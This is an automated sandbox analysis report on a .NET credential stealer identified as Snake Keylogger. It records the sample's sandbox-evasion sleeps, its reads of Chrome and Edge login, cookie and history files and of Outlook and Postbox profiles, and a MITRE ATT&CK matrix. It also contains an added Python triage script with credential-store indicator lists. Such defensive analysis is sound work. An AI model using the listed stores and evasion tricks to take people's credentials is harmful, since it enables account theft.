Source: 0.0.z1PO7311145.exe.b30000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.0.z1PO7311145.exe.b30000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000000.00000000.1238227546.0000000000B32000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: z1PO7311145.exe PID: 6492, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: z1PO7311145.exe, --U.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: z1PO7311145.exe, --.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: classification engine | Classification label: mal100.troj.spyw.winEXE@1/0@4/4
Source: C:\Users\user\Desktop\z1PO7311145.exe | Mutant created: NULL
Source: z1PO7311145.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: z1PO7311145.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%
Source: C:\Users\user\Desktop\z1PO7311145.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: z1PO7311145.exe, 00000000.00000002.3696383781.000000000316C000.00000004.00000800.00020000.00000000.sdmp, z1PO7311145.exe, 00000000.00000002.3696383781.0000000003179000.00000004.00000800.00020000.00000000.sdmp, z1PO7311145.exe, 00000000.00000002.3696383781.0000000003129000.00000004.00000800.00020000.00000000.sdmp, z1PO7311145.exe, 00000000.00000002.3696383781.0000000003139000.00000004.00000800.00020000.00000000.sdmp, z1PO7311145.exe, 00000000.00000002.3696383781.0000000003147000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: z1PO7311145.exe | ReversingLabs: Detection: 73%
Source: C:\Users\user\Desktop\z1PO7311145.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\z1PO7311145.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\z1PO7311145.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\z1PO7311145.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\z1PO7311145.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\z1PO7311145.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\z1PO7311145.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\z1PO7311145.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\z1PO7311145.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\z1PO7311145.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\z1PO7311145.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\z1PO7311145.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\z1PO7311145.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\z1PO7311145.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\z1PO7311145.exe | Section loaded: rasman.dll
Source: C:\Users\user\Desktop\z1PO7311145.exe | Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\z1PO7311145.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\z1PO7311145.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\z1PO7311145.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\z1PO7311145.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\z1PO7311145.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\z1PO7311145.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\z1PO7311145.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\z1PO7311145.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\z1PO7311145.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\z1PO7311145.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\z1PO7311145.exe | Section loaded: secur32.dll
Source: C:\Users\user\Desktop\z1PO7311145.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\z1PO7311145.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\z1PO7311145.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\z1PO7311145.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\z1PO7311145.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\z1PO7311145.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\z1PO7311145.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\z1PO7311145.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\z1PO7311145.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\z1PO7311145.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: z1PO7311145.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: z1PO7311145.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 0_2_06B39233 push es; ret 0_2_06B39244
Source: C:\Users\user\Desktop\z1PO7311145.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\z1PO7311145.exe | Memory allocated: 2CC0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\z1PO7311145.exe | Memory allocated: 2EC0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\z1PO7311145.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\z1PO7311145.exe | Thread delayed: delay time: 600000
Source: C:\Users\user\Desktop\z1PO7311145.exe | Thread delayed: delay time: 599889
Source: C:\Users\user\Desktop\z1PO7311145.exe | Thread delayed: delay time: 599781
Source: C:\Users\user\Desktop\z1PO7311145.exe | Thread delayed: delay time: 599672
Source: C:\Users\user\Desktop\z1PO7311145.exe | Thread delayed: delay time: 599547
Source: C:\Users\user\Desktop\z1PO7311145.exe | Thread delayed: delay time: 599437
Source: C:\Users\user\Desktop\z1PO7311145.exe | Thread delayed: delay time: 599328
Source: C:\Users\user\Desktop\z1PO7311145.exe | Thread delayed: delay time: 599219
Source: C:\Users\user\Desktop\z1PO7311145.exe | Thread delayed: delay time: 599094
Source: C:\Users\user\Desktop\z1PO7311145.exe | Thread delayed: delay time: 598984
Source: C:\Users\user\Desktop\z1PO7311145.exe | Thread delayed: delay time: 598875
Source: C:\Users\user\Desktop\z1PO7311145.exe | Thread delayed: delay time: 598765
Source: C:\Users\user\Desktop\z1PO7311145.exe | Thread delayed: delay time: 598656
Source: C:\Users\user\Desktop\z1PO7311145.exe | Thread delayed: delay time: 598546
Source: C:\Users\user\Desktop\z1PO7311145.exe | Thread delayed: delay time: 598437
Source: C:\Users\user\Desktop\z1PO7311145.exe | Thread delayed: delay time: 598328
Source: C:\Users\user\Desktop\z1PO7311145.exe | Thread delayed: delay time: 598218
Source: C:\Users\user\Desktop\z1PO7311145.exe | Thread delayed: delay time: 598109
Source: C:\Users\user\Desktop\z1PO7311145.exe | Thread delayed: delay time: 598000
Source: C:\Users\user\Desktop\z1PO7311145.exe | Thread delayed: delay time: 597890
Source: C:\Users\user\Desktop\z1PO7311145.exe | Thread delayed: delay time: 597781
Source: C:\Users\user\Desktop\z1PO7311145.exe | Thread delayed: delay time: 597672
Source: C:\Users\user\Desktop\z1PO7311145.exe | Thread delayed: delay time: 597560
Source: C:\Users\user\Desktop\z1PO7311145.exe | Thread delayed: delay time: 597453
Source: C:\Users\user\Desktop\z1PO7311145.exe | Thread delayed: delay time: 597344
Source: C:\Users\user\Desktop\z1PO7311145.exe | Thread delayed: delay time: 597234
Source: C:\Users\user\Desktop\z1PO7311145.exe | Thread delayed: delay time: 597125
Source: C:\Users\user\Desktop\z1PO7311145.exe | Thread delayed: delay time: 597016
Source: C:\Users\user\Desktop\z1PO7311145.exe | Thread delayed: delay time: 596906
Source: C:\Users\user\Desktop\z1PO7311145.exe | Thread delayed: delay time: 596797
Source: C:\Users\user\Desktop\z1PO7311145.exe | Thread delayed: delay time: 596687
Source: C:\Users\user\Desktop\z1PO7311145.exe | Thread delayed: delay time: 596578
Source: C:\Users\user\Desktop\z1PO7311145.exe | Thread delayed: delay time: 596469
Source: C:\Users\user\Desktop\z1PO7311145.exe | Thread delayed: delay time: 596359
Source: C:\Users\user\Desktop\z1PO7311145.exe | Thread delayed: delay time: 596250
Source: C:\Users\user\Desktop\z1PO7311145.exe | Thread delayed: delay time: 596141
Source: C:\Users\user\Desktop\z1PO7311145.exe | Thread delayed: delay time: 596016
Source: C:\Users\user\Desktop\z1PO7311145.exe | Thread delayed: delay time: 595891
Source: C:\Users\user\Desktop\z1PO7311145.exe | Thread delayed: delay time: 595781
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 595672Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 595562Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 595453Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 595333Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 595134Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 595030Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 594921Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 594800Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 594685Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 594578Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 594469Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exe | Window / User API: threadDelayed 2602
                            Source: C:\Users\user\Desktop\z1PO7311145.exe | Window / User API: threadDelayed 7248
                            Source: C:\Users\user\Desktop\z1PO7311145.exe TID: 6752 | Thread sleep count: 36 > 30
                            Source: C:\Users\user\Desktop\z1PO7311145.exe TID: 6752 | Thread sleep time: -33204139332677172s >= -30000s
                            Source: C:\Users\user\Desktop\z1PO7311145.exe TID: 6752 | Thread sleep time: -600000s >= -30000s
                            Source: C:\Users\user\Desktop\z1PO7311145.exe TID: 2412 | Thread sleep count: 2602 > 30
                            Source: C:\Users\user\Desktop\z1PO7311145.exe TID: 6752 | Thread sleep time: -599889s >= -30000s
                            Source: C:\Users\user\Desktop\z1PO7311145.exe TID: 2412 | Thread sleep count: 7248 > 30
                            Source: C:\Users\user\Desktop\z1PO7311145.exe TID: 6752 | Thread sleep time (48 records, one per report line, each compared against the -30000s threshold):
                                -599781s, -599672s, -599547s, -599437s, -599328s, -599219s, -599094s, -598984s,
                                -598875s, -598765s, -598656s, -598546s, -598437s, -598328s, -598218s, -598109s,
                                -598000s, -597890s, -597781s, -597672s, -597560s, -597453s, -597344s, -597234s,
                                -597125s, -597016s, -596906s, -596797s, -596687s, -596578s, -596469s, -596359s,
                                -596250s, -596141s, -596016s, -595891s, -595781s, -595672s, -595562s, -595453s,
                                -595333s, -595134s, -595030s, -594921s, -594800s, -594685s, -594578s, -594469s
                            Source: C:\Users\user\Desktop\z1PO7311145.exe | Thread delayed: delay time (51 records, one per report line, in the order recorded):
                                922337203685477, 600000, 599889, 599781, 599672, 599547,
                                599437, 599328, 599219, 599094, 598984, 598875, 598765, 598656, 598546, 598437,
                                598328, 598218, 598109, 598000, 597890, 597781, 597672, 597560, 597453, 597344,
                                597234, 597125, 597016, 596906, 596797, 596687, 596578, 596469, 596359, 596250,
                                596141, 596016, 595891, 595781, 595672, 595562, 595453, 595333, 595134, 595030,
                                594921, 594800, 594685, 594578, 594469
                            Source: z1PO7311145.exe, 00000000.00000002.3697607782.0000000004189000.00000004.00000800.00020000.00000000.sdmp | Binary or memory strings (one record per report line):
                                Interactive Brokers - GDCDYNVMware20,11696492231p
                                Interactive Brokers - EU WestVMware20,11696492231n
                                Canara Transaction PasswordVMware20,11696492231}
                                interactivebrokers.co.inVMware20,11696492231d
                                netportal.hdfcbank.comVMware20,11696492231
                                outlook.office.comVMware20,11696492231s
                                Interactive Brokers - non-EU EuropeVMware20,11696492231
                                AMC password management pageVMware20,11696492231
                                interactivebrokers.comVMware20,11696492231
                                microsoft.visualstudio.comVMware20,11696492231x
                                Interactive Brokers - COM.HKVMware20,11696492231
                                Canara Change Transaction PasswordVMware20,11696492231^
                                Test URL for global passwords blocklistVMware20,11696492231
                                outlook.office365.comVMware20,11696492231t
                                Interactive Brokers - NDCDYNVMware20,11696492231z
                                discord.comVMware20,11696492231f
                            Source: z1PO7311145.exe, 00000000.00000002.3694144020.00000000010D3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                            Source: z1PO7311145.exe, 00000000.00000002.3697607782.0000000004189000.00000004.00000800.00020000.00000000.sdmp | Binary or memory strings (continued, one record per report line):
                                global block list test formVMware20,11696492231
                                dev.azure.comVMware20,11696492231j
                                www.interactivebrokers.comVMware20,11696492231}
                                www.interactivebrokers.co.inVMware20,11696492231~
                                bankofamerica.comVMware20,11696492231x
                                trackpan.utiitsl.comVMware20,11696492231h
                                tasks.office.comVMware20,11696492231o
                                account.microsoft.com/profileVMware20,11696492231u
                                Canara Change Transaction PasswordVMware20,11696492231
                                Interactive Brokers - EU East & CentralVMware20,11696492231
                                ms.portal.azure.comVMware20,11696492231
                                turbotax.intuit.comVMware20,11696492231t
                                secure.bankofamerica.comVMware20,11696492231|UE
                                Canara Transaction PasswordVMware20,11696492231x
                                Interactive Brokers - HKVMware20,11696492231]
                            Source: C:\Users\user\Desktop\z1PO7311145.exe | Process information queried: ProcessInformation
                            Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 0_2_06B39548 LdrInitializeThunk
                            Source: C:\Users\user\Desktop\z1PO7311145.exe | Process token adjusted: Debug
                            Source: C:\Users\user\Desktop\z1PO7311145.exe | Memory allocated: page read and write | page guard
                            Source: C:\Users\user\Desktop\z1PO7311145.exe | Queries volume information: C:\Users\user\Desktop\z1PO7311145.exe VolumeInformation
                            Source: C:\Users\user\Desktop\z1PO7311145.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Users\user\Desktop\z1PO7311145.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                            Source: C:\Users\user\Desktop\z1PO7311145.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                            Source: C:\Users\user\Desktop\z1PO7311145.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                            Source: C:\Users\user\Desktop\z1PO7311145.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                            Source: C:\Users\user\Desktop\z1PO7311145.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                            Source: C:\Users\user\Desktop\z1PO7311145.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                            Source: C:\Users\user\Desktop\z1PO7311145.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                            Stealing of Sensitive Information

                            Source: Yara match | File source: 00000000.00000002.3696383781.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: z1PO7311145.exe, type: SAMPLE
                            Source: Yara match | File source: 0.0.z1PO7311145.exe.b30000.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 00000000.00000000.1238227546.0000000000B32000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara match | File source: Process Memory Space: z1PO7311145.exe PID: 6492, type: MEMORYSTR
                            Source: Yara match | File source: z1PO7311145.exe, type: SAMPLE
                            Source: Yara match | File source: 0.0.z1PO7311145.exe.b30000.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 00000000.00000002.3696383781.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000000.00000000.1238227546.0000000000B32000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara match | File source: Process Memory Space: z1PO7311145.exe PID: 6492, type: MEMORYSTR
                            Source: C:\Users\user\Desktop\z1PO7311145.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                            Source: C:\Users\user\Desktop\z1PO7311145.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                            Source: C:\Users\user\Desktop\z1PO7311145.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                            Source: C:\Users\user\Desktop\z1PO7311145.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
                            Source: C:\Users\user\Desktop\z1PO7311145.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                            Source: C:\Users\user\Desktop\z1PO7311145.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                            Source: C:\Users\user\Desktop\z1PO7311145.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                            Source: C:\Users\user\Desktop\z1PO7311145.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                            Source: C:\Users\user\Desktop\z1PO7311145.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                            Source: C:\Users\user\Desktop\z1PO7311145.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                            Source: Yara match | File source: z1PO7311145.exe, type: SAMPLE
                            Source: Yara match | File source: 0.0.z1PO7311145.exe.b30000.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 00000000.00000000.1238227546.0000000000B32000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara match | File source: Process Memory Space: z1PO7311145.exe PID: 6492, type: MEMORYSTR
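The sleep, file-open and registry records in this report are the raw material for a triage script. The Python below is an added example written for this page, not code from the report or from Joe Sandbox. It parses lines in the report's raw `Source: ...` format (tolerating the fused `exeThread delayed` form, a `|` separator and the `Jump to behavior` link residue), totals the requested delays, flags the countdown pattern in the delay values, recognises the `922337203685477` record as the millisecond value of .NET `TimeSpan.MaxValue` (Int64.MaxValue ticks divided by 10 000, i.e. an open-ended wait rather than a real timer), and maps the opened files and registry keys to the credential stores they belong to. The sample lines are constructed from the entries shown above; the thresholds (30 000 and 30) are the ones the report itself prints, and the "countdown loop" reading is an interpretation, labelled as such in the code.

```python
"""Triage of Joe Sandbox behaviour lines (added example, not Joe Sandbox code)."""
import re
from typing import Dict, List, Tuple

# .NET TimeSpan.MaxValue in ms (Int64.MaxValue ticks / 10_000 ticks per ms): an open-ended wait, not a timer.
DOTNET_TIMESPAN_MAX_MS = (2**63 - 1) // 10_000          # 922337203685477
SLEEP_COUNT_THRESHOLD = 30                               # the "> 30" the report prints

# Path fragments of the browser / mail stores seen in the 'File opened' records.
FILE_INDICATORS = {
    r"\Login Data": "saved logins",
    r"\Web Data": "autofill / payment data",
    r"\Network\Cookies": "cookies",
    r"\History": "browsing history",
    r"\PostboxApp\Profiles": "Postbox mail profiles",
}
REGISTRY_INDICATORS = {
    r"Windows Messaging Subsystem\Profiles\Outlook": "Outlook profile (mail credentials)",
    r"Microsoft\Cryptography MachineGuid": "MachineGuid (host identifier)",
}

# Accept the raw fused lines ("...exeThread delayed") or a " | " separator; "Jump to behavior" is link residue.
_DELAY_RE = re.compile(r"Thread delayed: delay time: (\d+)")
_SLEEP_RE = re.compile(r"TID: (\d+)\s*\|?\s*Thread sleep time: -(\d+)s >= -(\d+)s")
_COUNT_RE = re.compile(r"TID: (\d+)\s*\|?\s*Thread sleep count: (\d+) > (\d+)")
_FILE_RE = re.compile(r"File opened: (.+?)\s*(?:Jump to behavior)?\s*$")
_KEY_RE = re.compile(r"Key (?:value queried|opened): (.+?)\s*(?:Jump to behavior)?\s*$")

def is_countdown(delays: List[int], max_step_ms: int = 1_000) -> bool:
    """Consecutive delays shrinking by a small step (about 110 ms in this report): an
    interpretation consistent with a loop that re-requests the remaining wait each time it wakes."""
    steps = [a - b for a, b in zip(delays, delays[1:])]
    return len(steps) >= 3 and all(0 < s <= max_step_ms for s in steps)

def summarize_sleeps(lines: List[str]) -> Dict[str, object]:
    delays, long_sleeps, counts = [], [], {}
    for line in lines:
        if m := _DELAY_RE.search(line):
            delays.append(int(m.group(1)))
        elif (m := _SLEEP_RE.search(line)) and int(m.group(2)) >= int(m.group(3)):
            long_sleeps.append((m.group(1), int(m.group(2))))   # beyond the report's own threshold
        elif m := _COUNT_RE.search(line):
            counts[m.group(1)] = max(counts.get(m.group(1), 0), int(m.group(2)))
    finite = [d for d in delays if d != DOTNET_TIMESPAN_MAX_MS]
    return {"infinite_waits": len(delays) - len(finite), "finite_delays": finite,
            "total_requested_ms": sum(finite), "countdown_loop": is_countdown(finite),
            "long_sleeps": long_sleeps, "sleep_counts": counts}

def credential_store_hits(lines: List[str]) -> List[Tuple[str, str, str]]:
    hits = []   # (owner, what, path) for each opened file that is a browser or mail store
    for line in lines:
        if not (m := _FILE_RE.search(line)):
            continue
        path = m.group(1).strip()
        owner = ("Chrome" if r"\Google\Chrome\User Data" in path
                 else "Edge" if r"\Microsoft\Edge\User Data" in path else "other")
        for fragment, what in FILE_INDICATORS.items():
            if fragment.lower() in path.lower():
                hits.append((owner, what, path))
                break
    return hits

def registry_hits(lines: List[str]) -> List[Tuple[str, str]]:
    hits = []
    for line in lines:
        if m := _KEY_RE.search(line):
            key = m.group(1).strip()
            hits += [(what, key) for frag, what in REGISTRY_INDICATORS.items() if frag.lower() in key.lower()]
    return hits

def triage(lines: List[str]) -> Dict[str, bool]:
    s, files, keys = summarize_sleeps(lines), credential_store_hits(lines), registry_hits(lines)
    return {
        "sandbox_evasion": bool(s["infinite_waits"] or s["long_sleeps"]
                                or any(n > SLEEP_COUNT_THRESHOLD for n in s["sleep_counts"].values())),
        "browser_theft": any(what != "Postbox mail profiles" for _, what, _ in files),
        "mail_theft": any(what == "Postbox mail profiles" for _, what, _ in files)
                      or any("mail" in what for what, _ in keys),
        "host_fingerprint": any("MachineGuid" in what for what, _ in keys),
    }

# Constructed sample: a few records copied in the report's raw line format.
SRC = r"Source: C:\Users\user\Desktop\z1PO7311145.exe"
SAMPLE_LINES = [
    SRC + "Thread delayed: delay time: 922337203685477Jump to behavior",
    SRC + "Thread delayed: delay time: 600000Jump to behavior",
    SRC + "Thread delayed: delay time: 599889Jump to behavior",
    SRC + "Thread delayed: delay time: 599781Jump to behavior",
    SRC + "Thread delayed: delay time: 599672Jump to behavior",
    SRC + " TID: 6752Thread sleep time: -600000s >= -30000sJump to behavior",
    SRC + " TID: 2412Thread sleep count: 7248 > 30Jump to behavior",
    SRC + r"File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior",
    SRC + r"File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior",
    SRC + r"File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior",
    SRC + r"Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior",
    SRC + r"Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior",
]
if __name__ == "__main__":
    print(triage(SAMPLE_LINES), summarize_sleeps(SAMPLE_LINES)["total_requested_ms"])
```

Run as a script it prints the verdict flags and the total finite delay requested; point the parsing functions at the full behaviour listing to get the complete picture. Two cautions when reading this report with it: the `-30000s` / `> 30` thresholds are the sandbox's own and not a general standard, and the `VMware20,11696492231` memory strings listed under sandbox evasion are each attached to a browser saved-login label (Interactive Brokers, Canara, outlook.office.com and so on) in the same dump, after the sample opened Chrome's `Login Data`; they are most plausibly content read from that credential store rather than VM-detection logic in the binary, so they carry little weight on their own.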

                            Remote Access Functionality

                            Source: Yara match | File source: 00000000.00000002.3696383781.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: z1PO7311145.exe, type: SAMPLE
                            Source: Yara match | File source: 0.0.z1PO7311145.exe.b30000.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 00000000.00000000.1238227546.0000000000B32000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara match | File source: Process Memory Space: z1PO7311145.exe PID: 6492, type: MEMORYSTR
                            Source: Yara match | File source: z1PO7311145.exe, type: SAMPLE
                            Source: Yara match | File source: 0.0.z1PO7311145.exe.b30000.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 00000000.00000002.3696383781.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000000.00000000.1238227546.0000000000B32000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara match | File source: Process Memory Space: z1PO7311145.exe PID: 6492, type: MEMORYSTR
MITRE ATT&CK Matrix (one tactic per row; a leading number is the count of matching signatures for that technique)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: 1 Disable or Modify Tools; 31 Virtualization/Sandbox Evasion; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 DLL Side-Loading; Steganography
Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: 1 Security Software Discovery; 1 Process Discovery; 31 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 System Network Configuration Discovery; 13 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: 1 Email Collection; 11 Archive Collected Data; 1 Data from Local System; Input Capture; Keylogging; GUI Input Capture
Command and Control: 1 Web Service; 11 Encrypted Channel; 3 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 14 Application Layer Protocol; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
